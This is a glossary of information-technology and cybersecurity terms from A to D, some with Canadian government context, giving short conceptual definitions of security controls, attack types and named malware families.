Acceptable Use Policy - A policy that a user must agree to follow in order to be provided with access to a network or to the Internet.

Acceptance Test–Driven Development ATDD - A collaborative process where developers, testers and business representatives come together to work out requirements, perceive potential pitfalls and reduce the chance of errors before coding begins.

Access Control - Certifying that only authorized access is given to assets (both physical and electronic). For physical assets, access control may be required for a facility or restricted area (e.g. screening visitors and materials at entry points, escorting visitors). For IT assets, access controls may be required for networks, systems, and information (e.g. restricting users on specific systems, limiting account privileges).

Access Control Facility - ACF2 (more formally, CA-ACF2; the ACF stands for Access Control Facility) is a set of programs from Computer Associates that enable security on mainframes.

Access Control List ACL - A table that tells a computer operating system which access rights each user has to a particular system object, such as a file directory or individual file.

Access Governance AG - An aspect of Information Technology (IT) security management that seeks to reduce the risks associated with excessive access rights, inactive users and orphan accounts.

Access Layer - The network layer at which host computers and end users connect to the network.

Access List AL - List of permissions used in physical and information technology (IT) security to control who is allowed contact with a corporate asset.

Access Log - A record of all requests for individual files that visitors have made to a web site.

Access Method - Program or a hardware mechanism that moves data between the computer and an outlying device such as a HDD or SSD or a display terminal.

Access Network - User network that connects subscribers to a particular service provider and, through the carrier network, to other networks such as the Internet.

Access Network Query Protocol ANQP - Query and response protocol that defines services offered by an access point, typically at a Wi-Fi hot spot.

Access Point Base Station - the original term for what is now known as a femtocell.

Access Point Mapping - The act of locating and possibly exploiting connections to wireless local area networks while driving around a city or elsewhere.

Accountable COMSEC Material - COMSEC material requiring control and accountability within the National COMSEC Material Control System (NCMCS) as directed by its Accounting Legend Code (ALC). Control and accountability are required because transfer or disclosure of this material could be detrimental to Canada's national interest. Also known as ACM.

Accumulator - A register for short-term, intermediate storage of arithmetic and logic data in a computer's CPU (central processing unit).

ACID - Atomicity, Consistency, Isolation, and Durability is an acronym and mnemonic device for learning and remembering the four primary attributes ensured to any transaction by a transaction manager (which is also called a transaction monitor).

ACK - In some digital communication protocols, ACK is the name of a signal that data has been received successfully (for example, with an acceptable number of errors).

ACL - An access control list (ACL) is a table that tells a computer operating system which access rights each user has to a particular system object, such as a file directory or individual file.

ACM - The ACM (Association for Computing Machinery), founded in 1947, is the largest and oldest international scientific and industrial computer society.

Acoustic Coupler - Hardware device that enables a modem (a device that converts signals from analog to digital and from digital back to analog) to connect to a voice circuit.

Acoustic Wave - A sound wave is the pattern of disturbance caused by the movement of energy traveling through a medium (such as air, water, or any other liquid or solid matter) as it propagates away from the source of the sound.

Acoustic Infection - Type of malware that uses a compromised computer’s sound card and speakers to send data using a covert ultrasonic acoustical mesh network.

Acoustical Mesh Network - A decentralized communication system that transmits data by using sound to connect computers.

ACPI Advanced Configuration and Power Interface - Industry specification for the efficient handling of power consumption in desktop and mobile computers.

ACR - Attenuation-to-crosstalk ratio (ACR), also called headroom, is the difference, expressed as a figure in decibels (dB), between the signal attenuation produced by a wire or cable transmission medium and the near-end crosstalk (NEXT).

Acrobat - Program from Adobe that lets you capture a document and then view it in its original format and appearance.

ACeS Asia Cellular Satellite System - Combined cellular telephone and satellite wireless system from Ericsson that provides digital communication service to mobile phone and computer users in the Asia Pacific Region.

ACF2 - More formally CA-ACF2 (the ACF stands for Access Control Facility), a set of programs from Computer Associates that enable security on mainframes.

Adaptive Ransomware Attack - An Adaptive Ransomware Attack (ARA) refers to a ransomware attack that combines advanced automation and real-time human response. Hackers adapt their tools and techniques on the fly to get around defense mechanisms and infect your network with ransomware.

Advance on State-of-the-Art - Refers to the highest level of general development, as of a device, technique, or scientific field, achieved at a particular time. However, in some contexts it can also refer to a level of development reached at any particular time as a result of the common methodologies employed at the time.

Administrative Privileges - The permissions that allow a user to perform certain functions on a system or network, such as installing software and changing configuration settings.

Advanced Persistent Threat APT - An advanced persistent threat (APT) is a prolonged and targeted cyberattack in which an intruder gains access to a network and remains undetected for a period of time. The intention of an APT attack is usually to monitor network activity and steal data rather than to cause damage to the network or organization.

Advanced Volatile Threats AVT - Advanced Volatile Threats (AVT) are threats that use memory-based malware to attack their targets. They fall into several fileless-attack categories; memory-only threats, for example, are attacks that exploit vulnerabilities to execute their payloads directly in memory.

Adware - Adware, or advertising-supported software, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process.

Angler Exploit Kit - Angler is a covert exploit kit that leverages the vulnerabilities in Adobe Flash, Microsoft Internet Explorer, and Microsoft Silverlight to distribute malicious software to vulnerable machines.

Anomaly Based Detection - Anomaly-based detection is the process of comparing definitions of what activity is considered normal against observed events to identify significant deviations. An IDPS using anomaly-based detection has profiles that represent the normal behavior of such things as users, hosts, network connections, or applications.

Anomaly Based Intrusion Detection System - An anomaly-based intrusion detection system is an intrusion detection system for detecting both network and computer intrusions and misuse by monitoring system activity and classifying it as either normal or anomalous.

Anonymizing Proxy - Anonymizing proxies are servers that function as an anonymous relay between a user and a destination website to obfuscate web browsing activity. Some proxies also provide a primitive layer of encryption on the user side. Anonymizers are used for a multitude of reasons, both good and bad.

AntiKeyLogger - Piece of software specifically designed to detect keyloggers on a computer, typically by comparing all files on the computer against a database of known keyloggers, looking for similarities that might signal the presence of a hidden keylogger. As anti-keyloggers have been designed specifically to detect keyloggers, they have the potential to be more effective than conventional antivirus software; some antivirus software does not consider a keylogger to be malware, as under some circumstances a keylogger can be a legitimate piece of software.

AntiMalware - Application that maintains computer security and protects sensitive data that is transmitted by a network or stored on local devices. Tools include anti-spyware, phishing tools, and antivirus to isolate viruses, trojans, worms, rootkits, and other known threats.

Anti-Phishing - An anti-phishing service is a technological service that helps prevent unauthorized access to secure and/or sensitive information. Anti-phishing services protect various types of data in diverse ways across a variety of platforms.

AntiSpam - Various anti-spam techniques are used to prevent email spam. No technique is a complete solution to the spam problem, and each has trade-offs between incorrectly rejecting legitimate email as opposed to not rejecting all spam – and the associated costs in time, effort, and cost of wrongfully obstructing good mail.

AntiSpoofing - Antispoofing is a technique for identifying and dropping packets that have a false source address. In a spoofing attack, the source address of an incoming packet is changed to make it appear as if it is coming from a known, trusted source.

AntiSpyware - Anti-spyware is a type of software that is designed to detect and remove unwanted spyware programs. Spyware is a type of malware that is installed on a computer without the user's knowledge in order to collect information about them.

AntiVirus - Antivirus software, or anti-virus software, also known as anti-malware, is a computer program used to prevent, detect, and remove malware. Antivirus software was originally developed to detect and remove computer viruses, hence the name.

Applicant - Someone who signs up or applies for something. A job applicant for example, often fills out a form and then interviews for the position s/he hopes to get.

Application Level Rootkit - Application level rootkits operate inside the victim computer by changing standard application files with rootkit files, or changing the behavior of present applications with patches, injected code etc.

Application Vulnerability - An application vulnerability is a system flaw or weakness in an application that could be exploited to compromise the security of the application. Once an attacker has found a flaw, or application vulnerability, and determined how to access it, the attacker has the potential to exploit the application vulnerability to facilitate a cyber crime. These crimes target the confidentiality, integrity, or availability (known as the “CIA triad”) of resources possessed by an application, its creators, and its users. Attackers typically rely on specific tools or methods to perform application vulnerability discovery and compromise. According to Gartner Security, the application layer currently contains 90% of all vulnerabilities.

ARP Spoofing - ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network. Once the attacker’s MAC address is connected to an authentic IP address, the attacker will begin receiving any data that is intended for that IP address. ARP spoofing can enable malicious parties to intercept, modify or even stop data in transit. ARP spoofing attacks can only occur on local area networks that utilize the Address Resolution Protocol.

Atmos - Atmos is representative of a new breed of malware, developed “very precisely” in order to carry out targeted attacks. Its developers go to great pains to fine-tune their creation; it is still at an early stage, but already poses a significant threat. Experts say Atmos may later become much more aggressive, attacking not just banks but other industries too.

Atom Bombing - Atom Bombing is a form of cyber attack that targets a vulnerability in Windows atom tables to inject and execute malicious code. While code injection is a well-known technique, Atom Bombing provides the potential for an attacker to create a breach and set up a persistent presence in a network. Atom tables are used by Windows applications to store integers and data strings that are shared between programs. This type of attack demonstrates how threat actors take advantage of operating systems by using legitimate pieces of those systems maliciously.

Attack Online - Online attacks come in many forms and target average individuals and large corporations alike. They usually attempt to steal financial and commercial information, disclose important data and sometimes, they are delivered to simply destroy data or block access to a server.

Attack Signature - An attack signature is a unique piece of information that is used to identify a particular cyber attack aimed at exploiting a known computer system or a software vulnerability. Attack signatures include certain paths used by cyber criminals in their malicious compromise attempts. These paths can define a certain piece of malicious software or an entire class of malware.

Authentication - The process of authentication (or identification) of an individual is usually based on a username and a password. This process is used to allow access to an online location or resource to the right individual by validating the identification.

Authoritative DNS - The term authoritative refers to any DNS server that has a complete copy of the domain's information, whether it was entered by an administrator or transferred from a primary server. Thus, a secondary server can and should be authoritative for any domain for which it performs secondary authoritative resolution.

Automatic form filler programs - Automatic form-filling programs may prevent keylogging by removing the requirement for a user to type personal details and passwords using the keyboard. Form fillers are primarily designed for web browsers to fill in checkout pages and log users into their accounts. Once the user's account and credit card information has been entered into the program, it will be automatically entered into forms without ever using the keyboard or clipboard, thereby reducing the possibility that private data is being recorded. However, someone with physical access to the machine may still be able to install software that is able to intercept this information elsewhere in the operating system or while in transit on the network. (Transport Layer Security (TLS) reduces the risk that data in transit may be intercepted by network sniffers and proxy tools.)

Autorun Worm - An "autorun worm" is a virus that hijacks an autorun.inf file and runs on your computer without your consent. They might spread over a network through mapped drives or from computer to computer via USB/thumb drives.

Artificial Intelligence AI - A subfield of computer science that develops intelligent computer programs to behave in a way that would be considered intelligent if observed in a human (e.g. solve problems, learn from experience, understand language, interpret visual scenes).

Asymmetric Key - Two related keys (a public key and a private key) that perform complementary operations, such as encrypt and decrypt or generate signatures.

Authorization - Access privileges granted to a user, program, or process.

Availability - The ability for the right people to access the right information or systems when needed. Availability is applied to information assets, software, and hardware (infrastructure and its components). Implied in its definition is that availability includes the protection of assets from unauthorized access and compromise.


Backdoor - An undocumented, private, or less-detectable way of gaining remote access to a computer, bypassing authentication measures, and obtaining access to plaintext.

Backdoor Trojan - A backdoor Trojan computer virus is a piece of malicious software that usually finds a way into its victim computers without the knowledge or consent of the owners. Once one of these viruses gets to work in a victim computer, it can enable the computer to be accessed and controlled remotely. This puts all data stored on the computer at risk, as well as endangers anyone who may enter personal information into the computer.

Backup - A backup is an exact copy of your files, your system files or any other system resources you need to protect. This precaution is necessary for all types of unpredictable events, like a system crash or when you remove or lose those files. The backup is supposed to be independent from your system and be used only when necessary.

Back-to-back Frames (Burstability) - Testing requires sending bursts of frames with minimum inter-frame gaps to the DUT and counting the number of frames then forwarded by the DUT. The Back-to-back Frames value is the number of frames in the longest burst of frames – at the highest throughput – the DUT can handle without any frame loss. This calculation helps determine the node buffer capacity.

Bandwidth - Capacity of a wired or wireless network communications link to transmit the maximum amount of data from one point to another over a computer network or internet connection in a given amount of time, usually one second. Synonymous with capacity, bandwidth describes the data transfer rate.

BAS Bait and Switch - Bad-faith way of changing web page content to earn a page rank. The author creates a web page with a set of keywords. After ranking, the author then proceeds to replace it with another project or product. When users enter the site, they see something entirely different.

Baseline Security - A Security Baseline defines a set of basic security objectives which must be met by any given service or system. The objectives are chosen to be pragmatic and complete, and do not impose technical means. Therefore, details on how these security objectives are fulfilled by a particular service/system must be documented in a separate "Security Implementation Document".

Beaconing - A common technique in which a threat actor uses malware to connect infrastructure to another system or network, bypassing firewall restrictions on incoming traffic.

Behaviour Based Detection - Behavior-based malware detection helps computer security professionals more quickly identify, block and eradicate malware by using an active approach to malware analysis. Behavior-based malware detection works by identifying malicious software by examining how it behaves rather than what it looks like. Behavior-based malware detection is designed to replace signature-based malware detection. It is sometimes powered by machine learning algorithms.

Bidder - A person or organization making a formal offer for something.

Biometrics - Biometrics is concerned with measuring physical traits and characteristics of a biological organism. Biometric authentication (or realistic authentication) is used in computer science as a form of identification and access control.

Black-Bag Cryptanalysis - Black-bag cryptanalysis is a euphemism for the acquisition of cryptographic secrets via burglary, or other covert means – rather than mathematical or technical cryptanalytic attack. The term refers to the black bag of equipment that a burglar would carry or a black bag operation.

Black Hat Hackers - Black Hat Hackers are the stereotypical illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black hat hackers break into secure networks to destroy, modify, or steal data, or to make the networks unusable for authorized network users.

Black Hat SEO - Black Hat Search Engine Optimization refers to a set of practices that are used to increase a site or page's rank in search engines through means that violate the search engines' terms of service. The term "black hat" originated in Western movies to distinguish the "bad guys" from the "good guys," who wore white hats.

Blackhole Exploit Kit - The Blackhole exploit kit is, as of 2012, the most prevalent web threat, where 29% of all web threats detected by Sophos and 91% by AVG are due to this exploit kit. Its purpose is to deliver a malicious payload to a victim's computer.

Blacklisting - A blacklist is a list of items in a set that are not accepted. In computer security, a blacklist may be used to exclude which set to detect, quarantine, block, or perform security scans on. This list is exclusionary, confirming that the item being analyzed is not acceptable. It is the opposite of a whitelist, which confirms that items are acceptable.

Blagging - Blagging is when someone makes up a story to gain a person's interest and uses this to encourage them to give away information about themselves, or even send money.

Blended Threat - A blended threat is a widely-used term that describes an online attack that spreads by using a combination of methods, usually a combination of worms, trojans, viruses and other malware. This combination of malware elements that uses multiple attack vectors increases the damage and makes individual systems and networks difficult to defend.

Bloatware - Bloatware is software that has unnecessary features that use large amounts of memory and RAM. Software comes to be known as bloatware when it becomes so unwieldy that its functionality is drowned out by its useless features.

Blockchain - A blockchain is a write-only database, dispersed over a network of interconnected computers, that uses cryptography to create a tamperproof public record of transactions. Because blockchain technology is transparent, secure and decentralized, a central actor cannot alter the public record.

Bogon - An illegitimate IP address that falls into a set of IP addresses that have not been officially assigned to an entity by an internet registration institute, such as the Internet Assigned Number Authority (IANA).

Bogon Filtering - Practice of filtering bogons, which are bogus (fake) IP addresses of a computer network. Bogons include IP packets on the public Internet that contain addresses that are not in any range allocated or delegated by the Internet Assigned Numbers Authority (IANA) or a delegated regional Internet registry (RIR) and allowed for public Internet use. The areas of unallocated address space are called the bogon space.

Boot Loader Level Rootkits - Boot loader level rootkits (bootkits) replace or modify the legitimate boot loader with another one, thus enabling the bootkit to be activated even before the operating system is started. Boot loader level rootkits are a serious threat to security because they can be used to steal encryption keys and passwords.

Boot Sector Malware - A boot sector virus is malware that infects the computer storage sector where startup files are found. The boot sector contains all the files required to start the operating system (OS) and other bootable programs.

Bot - Internet bots or web bots are software programs that perform automated tasks and specific operations. Though some bots serve harmless purposes in video games or online locations, there are a number of bots that can be employed in large networks, from where they can deliver malicious ads on popular sites or launch distributed online attacks against a number of designated targets.

Botnet - A botnet is a network of infected computers that communicate with each other in order to perform the same malicious actions, like launching spam campaigns or distributed denial-of-service attacks. The network can be controlled remotely by online criminals to serve their interests and, at the same time, this allows the hackers to avoid detection or legal actions by law agencies.

Boundary Interface - A network-layer interface between two zone interface points (ZIPs).

Bridge Mode - Configuration that disables the NAT feature on the modem and allows a router to function as a DHCP server without an IP Address conflict. Connecting multiple routers can extend the Wi-Fi coverage in your office/home.

Browser Based Exploitation - A misuse of legitimate browser components to execute malicious code. Simply visiting a website with hidden malicious code can result in exploitation.

Browser Hijacking - Browser hijacking is a form of unwanted software that modifies a web browser's settings without a user's permission, to inject unwanted advertising into the user's browser. A browser hijacker may replace the existing home page, error page, or search engine with its own.

Brute Force Attack - A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.

Buffer Overflow - In information security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.

Bug - A bug is a software flaw that produces an unexpected result that may affect the system's performance. Usually, a bug may cause system crashing or freezing. The main security issue that could appear is that bugs allow hackers to bypass access privileges or retrieve sensitive data from a network.

Building MicroServices - The rise of microservices has helped to accelerate the pace of development, as bigger applications are compiled from a number of small components, or microservices, that can be written concurrently. Unit testing technology that evaluates the security of small bits of code should be perfect for testing and building microservices. But when unit testing takes longer than the time required to actually write the code, many software teams may choose not to employ a complete security testing protocol in order to meet aggressive development timelines. Building microservices in a secure way requires technology that can scan bits of code quickly and cost-effectively.

Bulk Encryption - Bulk encryption technology provides a method to encrypt the combined transmission from a multiplexer in its entirety. An encryptor, also called an encipher, is placed between the multiplexer and the transmitter while a decryptor is positioned after the receiver.

Business Email Compromise BEC - Type of scam targeting companies who conduct wire transfers and have suppliers abroad. Corporate or publicly available email accounts of executives or high-level employees related to finance or involved with wire transfer payments are either spoofed or compromised through keyloggers or phishing attacks to do fraudulent transfers, resulting in hundreds of thousands of dollars in losses.

Business Email Compromise Scams - Business email compromise fraud is an email phishing scam that typically targets people who pay bills in businesses, government and nonprofit organizations. The scammer poses as a reliable source, such as the chief executive officer (CEO), who sends an email from a spoofed or hacked account to an accountant or chief financial officer (CFO). The email asks them to wire money, buy gift cards or send personal information, often for a plausible reason. If money is sent, it goes into an account controlled by the con artist.

Business Impact Analysis BIA - Business impact analysis BIA is a systematic process to determine and evaluate the potential effects of an interruption to critical business operations as a result of a disaster, accident or emergency.

BYOD - In the consumerization of IT, BYOD, or bring your own device, is a phrase that has become widely adopted to refer to employees who bring their own computing devices – such as smartphones, laptops and tablets – to the workplace for use and connectivity on the secure corporate network.


Cable Modem - A cable modem is a peripheral device used to connect to the Internet. It operates over coax cable TV lines and provides high-speed Internet access. Since cable modems offer an always-on connection and fast data transfer rates, they are considered broadband devices.

Cache - A cache is a technology to store data and allow future requests to be served at a higher speed. This high-speed storage method is usually used for web pages and online documents, like HTML pages and images, to increase the loading speed and avoid unwanted lag.

Cache Cramming - Cache cramming is a technique to trick a browser into running malicious Java code from the local disk instead of from the Internet. The execution of local code (which runs with fewer restrictions) enables online criminals to access the target computer.

Cache Poisoning - Cache poisoning is a type of attack in which corrupt data is inserted into the cache database of the Domain Name System (DNS) name server. The Domain Name System is a system that associates domain names with IP addresses. Devices that connect to the internet or other private networks rely on the DNS for resolving URLs, email addresses and other human-readable domain names into their corresponding IP addresses. In a DNS cache poisoning attack, a malicious party sends forged responses from an imposter DNS in order to reroute a domain name to a new IP address.

Card Reader - A card reader is a data input device that reads data from a card-shaped storage medium. The first were punched card readers, which read the paper or cardboard punched cards that were used during the first several decades of the computer industry to store information and programs for computer systems. Modern card readers are electronic devices that can read plastic cards embedded with either a barcode, magnetic strip, computer chip or another storage medium.

Catfishing - Catfishing is a type of deceptive activity where a person creates a sock puppet social networking presence, or fake identity on a social network account, usually targeting a specific victim for deception. Catfishing is often employed for romance scams on dating websites.

Certified Ethical Hacker - Qualification obtained by demonstrating knowledge of assessing the security of computer systems by looking for weaknesses and vulnerabilities in target systems, using the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system.

Chain of Custody - Chain of custody is used in investigations and in the handling of evidence to ensure that no gaps in possession occur. Such gaps, if they occurred, could invalidate a case.

Challenge - Address scientific and technological needs/gaps/challenges faced by government. May identify only one challenge or multiple challenges.

Challenge Notice - A solicitation seeking ideas and/or solutions to one or more Challenges. Multiple notices will be published addressing challenges faced by various Government of Canada departments and/or agencies, and details related to each Challenge will be published under distinct Challenge Notices.

Challenge-Response Authentication - In computer security, challenge–response authentication is a family of protocols in which one party presents a question ("challenge") and another party must provide a valid answer ("response") to be authenticated.

Chargeware - Chargeware is seemingly valid looking mobile applications used to charge a user for services without proper notification or knowledge. Often focused on Internet pornography, third-party porn apps are downloaded onto a user's mobile device, in turn infecting their phone with the malware known as Chargeware.

Chief Information Officer CIO - The Chief Information Officer is the title of the person responsible for the information technology systems of a company. The job responsibilities include planning the technology architecture, aligning the corporate network with the development of the business, and developing a secure financial management system for the company.

Ciphertext - A cryptography term for encrypted information.

CISO - CISO (acronym for Chief Information Security Officer) is a senior-level executive job in a company, in the IT or cyber security department. A CISO’s responsibilities include ensuring and maintaining adequate protection for the company’s assets and technology, in terms of both strategy and development, to mitigate and manage cyber security risks. CSO (Chief Security Officer) is another name used for the same job.

Citadel - Citadel Trojan is malware created by a malicious code generating program. Citadel was designed to steal personal information, including banking and financial information, from its victims. The Citadel Trojan, based on the Zeus source code, constructs a botnet consisting of a large number of infected computers.

Classified Information - A Government of Canada label for specific types of sensitive data that, if compromised, could cause harm to the national interest (e.g. national defence, relationships with other countries, economic interests).

Clearing - Applying logical techniques to sanitize data in all user-addressable storage locations to protect against simple ways of recovering data. This is done by overwriting data with a new value, or if overwriting is not supported, by using a menu option to reset the device to factory settings.

Clear Text - Transmitted or stored text that has not been subjected to encryption and is not meant to be encrypted. As such, clear text does not require decryption in order to be displayed. In its simplest form, clear text is rendered as ASCII that can be read by any word processor or text editor. However, clear text can be subjected to encoding in a special format such as Word, WordPerfect or HTML. Any text that can be read on a computer with the appropriate program but without the need for decryption is considered clear text.

Clone Phishing - Clone phishing schemes replicate an email message someone has recently received, adding a malicious link to click on. To explain the duplicate nature of the email and to persuade recipients to click and re-enter personal information, it will usually state that it is being resent in order to provide an updated version.

Cloud Computing - The use of remote servers hosted on the Internet. Cloud computing allows users to access a shared pool of computing resources (such as networks, servers, applications, or services) on demand and from anywhere, especially data storage and computing power, without direct active management by the user. The term is generally used to describe data centers available to many users over the Internet.

Code Injection - The code injection technique is usually used by online attackers to change the course of execution of a computer program. This method is used by online criminals to spread malicious software by infecting legitimate websites with malicious code.

Command and Control Center - In the military, the term command and control (C2) means a process (not the systems, as often thought) that commanders, including command organizations, use to plan, direct, coordinate, and control their own and friendly forces and assets to ensure mission accomplishment.

Command and Control Server - A command-and-control [C&C] server is a computer controlled by an attacker or cybercriminal which is used to send commands to systems compromised by malware and receive stolen data from a target network. Many campaigns have been found using cloud-based services, such as webmail and file-sharing services, as C&C servers to blend in with normal traffic and avoid detection.

Commercialization - Process of introducing a new product or method into the market.

Compromise - The intentional or unintentional disclosure of information, which adversely impacts its confidentiality, integrity, or availability.

Compromising Emanations - Unintentional signals that, if intercepted and analyzed, would disclose the information emanating from any information processing system or equipment.

Computer Abuse - Computer abuse is the unethical use of a computer to launch online attacks, like phishing and malware delivery campaigns, sabotage and cyberwar activities.

Computer Forensics - Computer forensics is a branch of digital forensic science pertaining to evidence found in computers and digital storage media.

Computer Incident Response Team CIRT - The Computer Incident Response Team investigates network security incidents that occur when unauthorized access takes place to network resources or protected data. Their job is to analyze how the incident took place and provide a response, by discovering how the breach occurred and what information has been lost.

COMSEC - Communications security (COMSEC) is the discipline of preventing unauthorized access to telecommunications information in readable form, while still delivering the information to the intended recipients. COMSEC comprises multiple disciplines such as Cryptographic Security, EMSEC (Emission Security), Transmission Security, and Physical Security.

COMSEC Account Custodian - The person responsible for the receipt, storage, access, distribution, accounting, disposal, and destruction of all COMSEC material charged to the COMSEC account. The custodian is appointed by the organization's COMSEC authority.

COMSEC Incident - An occurrence that threatens, or potentially threatens, the security of classified or protected Government of Canada information as it is being stored, processed, transmitted, or received.

COMSEC Material - An item designed to secure or authenticate telecommunications information (e.g. cryptographic keys, equipment, modules, devices, documents, hardware, firmware, or software that includes or describes cryptographic logic, and other items that perform COMSEC functions).

Confidentiality - Confidentiality represents a set of rules or an agreement that limits or restricts access to certain types of information. When such an agreement is in place, information is disclosed only to those who are authorized to view it.

Contract - Agreement between two or more persons, which creates an obligation to do or not to do a particular thing.

Controlled Cryptographic Item - An unclassified secure telecommunications or information system, or any associated cryptographic component, governed by a set of control requirements in the National COMSEC Material Control System (NCMCS). The type of item is labelled in the NCMCS as a "controlled cryptographic item" or "CCI".

Cookie - A cookie is a small text file which is placed on your computer when you visit a website. This cookie allows the website to keep track of your visit details and store your preferences. Cookies were designed to be helpful and to speed up the website the next time you access that location. At the same time, they are very useful for advertisers, who can match ads to your interests after they see your browsing history. Cookies and temporary files may affect your privacy, since they disclose your online habits, but it is possible to modify your web browser preferences and set a limit.

Cookie Drop/Stuff - An affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to the one visited by the user, usually without the user being aware of it.

CoreBOT - CoreBOT is a modular Trojan from the infostealer category. As the name says, CoreBOT was initially designed to collect and loot information from the infected computer or network. In time, CoreBOT quickly evolved and went on to add other capabilities, such as browser-based web injects, real-time form-grabbing, man-in-the-middle attacks, etc. Now its structure and tactics are similar to those of infamous financial malware strains, such as Dyreza or Neverquest. Its modular character makes CoreBOT appealing to cyber criminals because they can pack it with other types of malware and use it in complex cyber attacks.

Corporation - Company authorized to act as a single entity and recognized as such in law.

CPU - Central Processing Unit. Sometimes referred to simply as the central processor, but more commonly called a processor, the CPU is the brain of the computer, where most calculations take place.

Cracking - Software cracking is the modification of software to remove or disable features which are considered undesirable by the person cracking the software, especially copy protection features (including protection against the manipulation of software, serial number, hardware key, date checks and disc check) or software annoyances like nag screens and adware.

Credentials Management Attack - A credentials management attack attempts to breach username/password pairs and take control of user accounts. Once inside a system, an attacker can alter, steal, or delete data; initiate transactions; install additional malware; and gain broader and deeper access to systems and files.

Credential Stuffing - Credential stuffing is the automated injection of stolen username and password pairs ("credentials") into website login forms in order to fraudulently gain access to user accounts. Credential stuffing is a subset of the brute force attack category. Brute forcing tries multiple passwords against one or more accounts; in other words, it guesses the password. Credential stuffing specifically refers to using known (breached) username/password pairs against other websites.

Crimeware - Crimeware (as distinct from spyware and adware) is designed to perpetrate identity theft through social engineering or technical stealth in order to access a computer user's financial and retail accounts for the purpose of taking funds from those accounts or completing unauthorized transactions that enrich the cyberthief. Alternatively, crimeware may steal confidential or sensitive corporate information. Crimeware represents a growing problem in network security as many malicious code threats seek to pilfer confidential information.

Critical Infrastructure - Processes, systems, facilities, technologies, networks, assets, and services essential to the health, safety, security, or economic well-being of Canadians and the effective functioning of government. Critical infrastructure can be stand-alone or interconnected and interdependent within and across provinces, territories, and national borders. Disruptions of critical infrastructure could result in catastrophic loss of life, adverse economic effects, and significant harm to public confidence.

CRLF Injection - CRLF refers to the special character elements "Carriage Return" and "Line Feed." These elements are embedded in HTTP headers and other software code to signify an End of Line (EOL) marker. Many internet protocols, including MIME (e-mail), NNTP (newsgroups) and, more importantly, HTTP, use CRLF sequences to split text streams into discrete elements. Web application developers split HTTP and other headers based on where CRLF is located. Exploits occur when an attacker is able to inject a CRLF sequence into an HTTP stream. By introducing this unexpected CRLF injection, the attacker is able to maliciously exploit CRLF vulnerabilities in order to manipulate the web application's functions.

Cross Site Scripting XSS - Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Cross Site Request Forgery - Cross-Site Request Forgery (CSRF) is an attack outlined in the OWASP Top 10 whereby a malicious website will send a request to a web application that a user is already authenticated against from a different website. This way an attacker can access functionality in a target web application via the victim's already authenticated browser. Targets include web applications like social media, in-browser email clients, online banking and web interfaces for network devices.

Cryptanalysis - Cryptanalysis is the study of analyzing information systems in order to study the hidden aspects of the systems. Cryptanalysis is used to breach cryptographic security systems and gain access to the contents of encrypted messages, even if the cryptographic key is unknown.

Cryptographic Material - All material, including documents, devices, and equipment, that contains cryptographic information and is essential to encrypting, decrypting, or authenticating communications.

Cryptography - The study of techniques used to make plain information unreadable, as well as to convert it back to a readable form.

CryptoLocker - CryptoLocker is a type of ransomware which emerged in 2013 and whose objective is to infect victims using PCs with Microsoft Windows installed. As is the case with most ransomware, the main distribution method is spam emails with a malicious attachment. CryptoLocker relies on external infrastructure (a botnet) to launch its attacks and, when activated, encrypts the files and data stored on the local device, as well as those in cloud storage accounts if, for example, a Dropbox account is synced locally on the affected PC. CryptoLocker then displays a message informing the victims that paying a ransom in bitcoins is necessary if they want to get the decryption key (which is stored on servers controlled by the cyber criminals).

CryptoWall - CryptoWall is a ransomware Trojan which emerged as a CryptoLocker variant. Like most data-stealing ransomware, CryptoWall spreads mainly through phishing and spam campaigns that invite users to click a malicious link or download and execute an email attachment. Moreover, in order to increase distribution, cyber criminals included CryptoWall code in website ads. The ransomware, once executed, encrypts all the data on the victim's PC and on any other PC on the same network as the first affected computer. The victim is then prompted to pay the ransom in bitcoins so they can get the decryption key and regain access to their data. CryptoWall has already reached its fourth iteration and there is reason to believe that this won't be the last one.

CSO - Chief Security Officer is a top-level executive in charge of ensuring the security of a company’s personnel, financial, physical and digital assets. A CSO has both security and business oriented objectives, as he is responsible for aligning cyber protection with the company’s business goals. All security strategies, tactics and programs have to be directed and approved by the CSO. CISO (acronym for Chief Information Security Officer) is another name used for the same job.

CTB Locker - CTB-Locker is a ransomware variant that encrypts files on a victim’s hard disk before demanding a ransom be paid to decrypt the files. CTB-Locker is noteworthy for its high infection rates, use of Elliptic Curve Cryptography, Tor and bitcoins, and its multi-lingual capabilities. The authors of CTB-Locker are using an affiliate program to drive infections by outsourcing the infection process to a network of affiliates or partners in exchange for a cut of the profits.

Cyber Attack - A cyber-attack is considered to be any type of offensive action used by an individual or an organized group that targets computer networks, information systems or a large IT infrastructure by using various means to deploy malicious code for the purpose of stealing, altering or taking any advantage from this type of action. A cyber-attack can appear under different names, from cyber-campaign and cyber-warfare to cyber-terrorism or online attack. In recent years the software deployed in online attacks seems to have become more and more sophisticated, and law enforcement agencies around the world have a hard time trying to keep up with this global menace.

Cyber Incident - A cyber incident takes place when there is a violation of a security policy imposed on computer networks and the direct results affect an entire information system.

Cyber Security - Computer security, cybersecurity or information technology security is the protection of computer systems from the theft of or damage to their hardware, software, or electronic data, as well as from the disruption or misdirection of the services they provide.

Cyber Weapon - A cyberweapon is a malware agent employed for military, paramilitary, or intelligence objectives. They can infiltrate whole networks or infect individual computers. They rely on software vulnerabilities, poor cyber hygiene, and people who inadvertently open attachments infected with malware.

Dark Web - The dark web refers to websites and online content that exist outside the reach of traditional search engines and browsers. This content is hidden by encryption methods (in most cases, these sites use the Tor encryption tool to hide their identity and location) and can only be accessed with specific software, configuration settings or pending approval from their admins. The dark web is known for being a hub for illegal activities (drug and crime transactions, black hat hacking and so on).

